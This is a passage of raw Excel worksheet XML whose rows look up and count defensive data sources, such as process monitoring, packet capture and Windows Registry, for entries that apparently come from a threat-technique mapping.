    <col min="4" max="4" width="11.7109375" style="14" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="8.28515625" style="14" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9.140625" style="14"/>
    <col min="7" max="7" width="35.7109375" style="14" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="9.140625" style="3"/>
    <col min="9" max="9" width="9.140625" style="3" customWidth="1"/>
    <col min="10" max="22" width="9.140625" style="3"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="10" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="10" t="s">
        <v>56</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>57</v>
      </c>
      <c r="D1" s="10" t="s">
        <v>58</v>
      </c>
      <c r="E1" s="10" t="s">
        <v>59</v>
      </c>
      <c r="F1" s="10"/>
      <c r="G1" s="10" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A2" s="11" t="s">
        <v>61</v>
      </c>
      <c r="B2" s="6" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D2" s="6">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="6">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="13"/>
      <c r="G2" s="6">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A3" s="11" t="s">
        <v>62</v>
      </c>
      <c r="B3" s="6" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>1226</v>
      </c>
      <c r="D3" s="6">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="6">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="13"/>
      <c r="G3" s="6"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A4" s="11" t="s">
        <v>63</v>
      </c>
      <c r="B4" s="6" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>1226</v>
      </c>
      <c r="D4" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="6">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="13"/>
      <c r="G4" s="6"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A5" s="11" t="s">
        <v>64</v>
      </c>
      <c r="B5" s="6" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>1227</v>
      </c>
      <c r="D5" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E5" s="6">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F5" s="13"/>
      <c r="G5" s="6"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6" s="11" t="s">
        <v>65</v>
      </c>
      <c r="B6" s="6" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D6" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E6" s="6">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="13"/>
      <c r="G6" s="6"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A7" s="11" t="s">
        <v>66</v>
      </c>
      <c r="B7" s="6" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C7" s="12">
        <v>100</v>
      </c>
      <c r="D7" s="6">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E7" s="6">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F7" s="6"/>
      <c r="G7" s="6"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A8" s="11" t="s">
        <v>67</v>
      </c>
      <c r="B8" s="6" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C8" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D8" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E8" s="6">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F8" s="6"/>
      <c r="G8" s="6"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9" s="11" t="s">
        <v>69</v>
      </c>
      <c r="B9" s="6" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C9" s="12" t="s">
        <v>1230</v>
      </c>
      <c r="D9" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E9" s="6">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="F9" s="6"/>
      <c r="G9" s="6"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A10" s="11" t="s">
        <v>70</v>
      </c>
      <c r="B10" s="6" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Malware reverse engineering</v>
      </c>
      <c r="C10" s="12" t="s">
        <v>1231</v>
      </c>
      <c r="D10" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E10" s="6">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="6"/>
      <c r="G10" s="6"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11" s="11" t="s">
        <v>71</v>
      </c>
      <c r="B11" s="6" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C11" s="12" t="s">
        <v>1232</v>
      </c>
      <c r="D11" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="6"/>
      <c r="G11" s="6"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12" s="11" t="s">
        <v>72</v>
      </c>
      <c r="B12" s="6" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C12" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D12" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E12" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F12" s="6"/>
      <c r="G12" s="6"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A13" s="11" t="s">
        <v>73</v>
      </c>
      <c r="B13" s="6" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C13" s="12" t="s">
        <v>1233</v>
      </c>
      <c r="D13" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E13" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F13" s="6"/>
      <c r="G13" s="6"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A14" s="11" t="s">
        <v>74</v>
      </c>
      <c r="B14" s="6" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C14" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D14" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E14" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F14" s="6"/>
      <c r="G14" s="6"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A15" s="11" t="s">
        <v>75</v>
      </c>
      <c r="B15" s="6" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>1235</v>
      </c>
      <c r="D15" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="6"/>
      <c r="G15" s="6"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A16" s="11" t="s">
        <v>76</v>
      </c>
      <c r="B16" s="6" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C16" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D16" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E16" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F16" s="6"/>
      <c r="G16" s="6"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A17" s="11" t="s">
        <v>77</v>
      </c>
      <c r="B17" s="6" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D17" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="6"/>
      <c r="G17" s="6"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A18" s="11" t="s">
        <v>78</v>
      </c>
      <c r="B18" s="6" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process use of network,Process monitoring</v>
      </c>
      <c r="C18" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D18" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E18" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F18" s="6"/>
      <c r="G18" s="6"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A19" s="11" t="s">
        <v>79</v>
      </c>
      <c r="B19" s="6" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>1238</v>
      </c>
      <c r="D19" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E19" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F19" s="6"/>
      <c r="G19" s="6"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A20" s="11" t="s">
        <v>80</v>
      </c>
      <c r="B20" s="6" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>API monitoring,BIOS,EFI</v>
      </c>
      <c r="C20" s="12" t="s">
        <v>1239</v>
      </c>
      <c r="D20" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E20" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F20" s="6"/>
      <c r="G20" s="6"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A21" s="11" t="s">
        <v>81</v>
      </c>
      <c r="B21" s="6" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C21" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D21" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E21" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F21" s="6"/>
      <c r="G21" s="6"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A22" s="11" t="s">
        <v>82</v>
      </c>
      <c r="B22" s="6" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C22" s="12">
        <v>100</v>
      </c>
      <c r="D22" s="6">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E22" s="6">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="6"/>
      <c r="G22" s="6"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A23" s="11" t="s">
        <v>83</v>
      </c>
      <c r="B23" s="6" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C23" s="12" t="s">
        <v>1306</v>
      </c>
      <c r="D23" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E23" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F23" s="6"/>
      <c r="G23" s="6"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A24" s="11" t="s">
        <v>84</v>
      </c>
      <c r="B24" s="6" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C24" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D24" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E24" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F24" s="6"/>
      <c r="G24" s="6"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A25" s="11" t="s">
        <v>85</v>
      </c>
      <c r="B25" s="6" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C25" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D25" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E25" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F25" s="6"/>
      <c r="G25" s="6"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A26" s="11" t="s">
        <v>86</v>
      </c>
      <c r="B26" s="6" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C26" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D26" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="6"/>
      <c r="G26" s="6"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A27" s="11" t="s">
        <v>87</v>
      </c>
      <c r="B27" s="6" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C27" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D27" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E27" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F27" s="6"/>
      <c r="G27" s="6"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A28" s="11" t="s">
        <v>88</v>
      </c>
      <c r="B28" s="6" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C28" s="12" t="s">
        <v>1240</v>
      </c>
      <c r="D28" s="6">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E28" s="6">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F28" s="6"/>
      <c r="G28" s="6"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A29" s="11" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="6" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C29" s="12" t="s">
        <v>1241</v>
      </c>
      <c r="D29" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E29" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F29" s="6"/>
      <c r="G29" s="6"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A30" s="11" t="s">
        <v>90</v>
      </c>
      <c r="B30" s="6" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C30" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D30" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E30" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F30" s="6"/>
      <c r="G30" s="6"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A31" s="11" t="s">
        <v>91</v>
      </c>
      <c r="B31" s="6" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C31" s="12" t="s">
        <v>1242</v>
      </c>
      <c r="D31" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E31" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F31" s="6"/>
      <c r="G31" s="6"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A32" s="11" t="s">
        <v>92</v>
      </c>
      <c r="B32" s="6" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C32" s="12" t="s">
        <v>1243</v>
      </c>
      <c r="D32" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="6"/>
      <c r="G32" s="6"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A33" s="11" t="s">
        <v>93</v>
      </c>
      <c r="B33" s="6" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</v>
      </c>
      <c r="C33" s="12" t="s">
        <v>1244</v>
      </c>
      <c r="D33" s="6">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E33" s="6">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F33" s="6"/>
      <c r="G33" s="6"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A34" s="11" t="s">
        <v>94</v>
      </c>
      <c r="B34" s="6" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C34" s="12" t="s">
        <v>1245</v>
      </c>
      <c r="D34" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E34" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F34" s="6"/>
      <c r="G34" s="6"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A35" s="11" t="s">
        <v>95</v>
      </c>
      <c r="B35" s="6" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C35" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D35" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E35" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F35" s="6"/>
      <c r="G35" s="6"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A36" s="11" t="s">
        <v>96</v>
      </c>
      <c r="B36" s="6" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C36" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D36" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E36" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F36" s="6"/>
      <c r="G36" s="6"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A37" s="11" t="s">
        <v>97</v>
      </c>
      <c r="B37" s="6" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C37" s="12" t="s">
        <v>1237</v>
      </c>
      <c r="D37" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E37" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F37" s="6"/>
      <c r="G37" s="6"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A38" s="11" t="s">
        <v>98</v>
      </c>
      <c r="B38" s="6" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C38" s="12" t="s">
        <v>1246</v>
      </c>
      <c r="D38" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E38" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F38" s="6"/>
      <c r="G38" s="6"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A39" s="11" t="s">
        <v>99</v>
      </c>
      <c r="B39" s="6" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C39" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D39" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E39" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F39" s="6"/>
      <c r="G39" s="6"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A40" s="11" t="s">
        <v>100</v>
      </c>
      <c r="B40" s="6" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C40" s="12" t="s">
        <v>1247</v>
      </c>
      <c r="D40" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E40" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F40" s="6"/>
      <c r="G40" s="6"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A41" s="11" t="s">
        <v>101</v>
      </c>
      <c r="B41" s="6" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C41" s="12" t="s">
        <v>1248</v>
      </c>
      <c r="D41" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E41" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F41" s="6"/>
      <c r="G41" s="6"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A42" s="11" t="s">
        <v>102</v>
      </c>
      <c r="B42" s="6" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C42" s="12" t="s">
        <v>1249</v>
      </c>
      <c r="D42" s="6">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E42" s="6">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F42" s="6"/>
      <c r="G42" s="6"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A43" s="11" t="s">
        <v>103</v>
      </c>
      <c r="B43" s="6" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C43" s="12" t="s">
        <v>1227</v>
      </c>
      <c r="D43" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E43" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="6"/>
      <c r="G43" s="6"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A44" s="11" t="s">
        <v>104</v>
      </c>
      <c r="B44" s="6" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="12" t="s">
        <v>1250</v>
      </c>
      <c r="D44" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="6"/>
      <c r="G44" s="6"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A45" s="11" t="s">
        <v>105</v>
      </c>
      <c r="B45" s="6" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Services,Process command-line parameters</v>
      </c>
      <c r="C45" s="12" t="s">
        <v>1239</v>
      </c>
      <c r="D45" s="6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E45" s="6">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="6"/>
      <c r="G45" s="6"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A46" s="11" t="s">
        <v>106</v>
      </c>
      <c r="B46" s="6" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C46" s="12">
        <v>100</v>
      </c>
      <c r="D46" s="6">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E46" s="6">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F46" s="6"/>
      <c r="G46" s="6"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A47" s="11" t="s">
        <v>107</v>
      </c>
      <c r="B47" s="6" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C47" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D47" s="6">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E47" s="6">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F47" s="6"/>
      <c r="G47" s="6"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A48" s="11" t="s">
        <v>108</v>
      </c>
      <c r="B48" s="6" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C48" s="12" t="s">
        <v>1243</v>
      </c>
      <c r="D48" s="6">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E48" s="6">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F48" s="6"/>
      <c r="G48" s="6"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A49" s="11" t="s">
        <v>109</v>
      </c>
      <c r="B49" s="6" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C49" s="12" t="s">
